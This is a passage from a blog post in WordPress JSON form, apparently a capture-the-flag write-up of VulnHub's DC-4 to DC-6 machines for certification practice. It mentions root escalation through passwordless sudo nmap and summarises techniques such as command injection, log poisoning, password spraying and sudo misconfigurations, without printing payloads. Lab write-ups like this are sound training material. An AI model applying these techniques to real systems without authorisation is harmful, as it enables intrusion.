https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39-768x167.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39.png 1359w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Once that shell called back, running <code>sudo -l<\/code> again in the new context showed we could execute <code>nmap<\/code> as root without a password.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"740\" height=\"489\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-40.png\" alt=\"\" class=\"wp-image-313\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-40.png 740w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-40-300x198.png 300w\" sizes=\"auto, (max-width: 740px) 100vw, 
740px\" \/><\/figure>\n\n\n\n<p>Using this, we escalated to root and retrieved the flag:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"648\" height=\"294\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-41.png\" alt=\"\" class=\"wp-image-314\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-41.png 648w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-41-300x136.png 300w\" sizes=\"auto, (max-width: 648px) 100vw, 648px\" \/><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">Lessons Learned<\/h1>\n\n\n\n<p>This trio of challenges reinforced several key pentesting principles and techniques:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Thorough Enumeration is Crucial:<\/strong> Each machine started with the same full port scan and service detection, but the real work was in the web tier: a login form on DC-4, a contact form with an injectable parameter on DC-5 and a WordPress user list on DC-6. Uncovering every potential attack vector depends on that detailed reconnaissance.<\/li>\n\n\n\n<li><strong>Don\u2019t Underestimate Simple Vulnerabilities:<\/strong> DC-4\u2019s command injection, DC-5\u2019s log poisoning and DC-6\u2019s vulnerable WordPress plugin show that well-known, \u201cold-school\u201d bugs like OS command injection, log file inclusion or authenticated RCE are just as effective as more complex exploits, especially when chained with weak or reused credentials.<\/li>\n\n\n\n<li><strong>Privilege Escalation Creativity:<\/strong> DC-4 and DC-6 demonstrated different privilege escalation paths: plaintext passwords in a backup file and in local mail plus a sudo rule for a renamed <code>tee<\/code> on DC-4; a password in a to-do list, an editable file run through <code>sudo<\/code> and passwordless <code>sudo nmap<\/code> on DC-6. These remind us that understanding the underlying system and installed software is as important as finding the initial foothold.<\/li>\n\n\n\n<li><strong>Persistence &amp; Adaptability:<\/strong> The struggle to get a reverse shell at all in DC-5 was a good lesson in patience and flexibility. 
Sometimes exploits or payloads fail intermittently, so testing multiple methods and adapting is essential.<\/li>\n\n\n\n<li><strong>User Enumeration &amp; Password Spraying:<\/strong> DC-6 emphasized the power of username enumeration combined with password spraying to gain access. This remains a fundamental technique for breaking into web apps and CMS platforms like WordPress.<\/li>\n\n\n\n<li><strong>Always Check for Post-Exploitation Opportunities:<\/strong> Once inside, examining files like <code>things-to-do.txt<\/code> or running commands like <code>sudo -l<\/code> can reveal unexpected privilege escalation routes or useful insights, turning a limited shell into a full compromise.<\/li>\n<\/ol>\n\n\n\n<p>Overall, these challenges reinforced that a successful pentest isn\u2019t just about flashy exploits but about persistence, creativity, and attention to detail at every stage.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As part of my CEH Practical prep, I\u2019m sharpening my enumeration and exploitation workflow using realistic boot2root machines. The DC series on VulnHub is perfect for this: local, legal, and logically progressive. In this post, I\u2019ll walk through DC-4, DC-5, DC-6 \u2014 there are more web-focused VMs in the series. 
DC-4 Enumeration Let\u2019s start with [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[8],"tags":[31,29,30,32],"class_list":["post-292","post","type-post","status-publish","format-standard","hentry","category-ctf","tag-enumeration","tag-hydra","tag-nmap","tag-vulnhub"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=292"}],"version-history":[{"count":8,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/292\/revisions"}],"predecessor-version":[{"id":319,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/292\/revisions\/319"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}